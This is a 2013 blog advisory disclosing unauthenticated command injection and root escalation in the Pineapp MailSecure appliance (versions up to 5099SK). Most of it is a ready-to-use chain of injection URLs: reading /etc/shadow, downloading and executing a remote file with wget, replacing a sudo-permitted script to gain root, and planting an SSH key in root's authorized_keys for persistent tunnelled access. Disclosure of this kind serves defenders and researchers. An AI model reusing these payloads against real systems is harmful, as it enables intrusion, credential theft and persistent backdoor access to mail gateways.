martes, 19 de noviembre de 2013

[Advisory] Pineapp MailSecure total pwnage

In February 2013 I send Pineapp the following information:
-----------------------------------------------------------------
It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow

To upload any file (script, binary, etc...) it is possible with wget command.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile

Download and execute it is possible with this request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile

Details of bug:
Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html
----------------snip-----------------
$query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver"));
foreach ($query as $line)
    if ($line)
    echo preg_replace("/\t/","   ",$line)."
\n";
?>
----------------snip-----------------

Also it is possible make privilege escalation to root with a weak sudoers configuration, on /tmp/rc.firewall file. If you overwrite this file with this content:
---------
#!/bin/bash
$1
---------
you must get a privileged backdoor.
It is possible with the following request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '%23!/bin/bash' > /tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '$1' > /tmp/filecode
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv /tmp/rc.firewall /tmp/rc.firewall_
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat /tmp/fileheader /tmp/filecode > /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod %2bx /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm /tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm /tmp/filecode

And execute commands as root with:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod %2bx /tmp/rc.firewall 'whoami'

With this, you can sent a private ssh key and get access by ssh service. To perform this you can make the following request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70' > /tmp/key.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat /tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall 'killall sshd'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall 'sshd'

This key have password: '1234'

Now you can get access with ssh as root and up tun interface with the appliance with ssh client:
ssh root@192.168.24.24 -p 7022 -w0:0 -i /home/ruben/key

With this the attacker have a VPN on the same network segment of MailSecure appliance vulnerable.
-----------------------------------------------------------------

This I made a live demo of vulnerability, but don't revealed the manufacturer, then the bugs was not fixed.
http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html
Video demo will be release soon on my blog.

Version affected:
MailSecure <= 5099SK

Credits:
-----------
Ruben Garrote García
rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com
@Boken_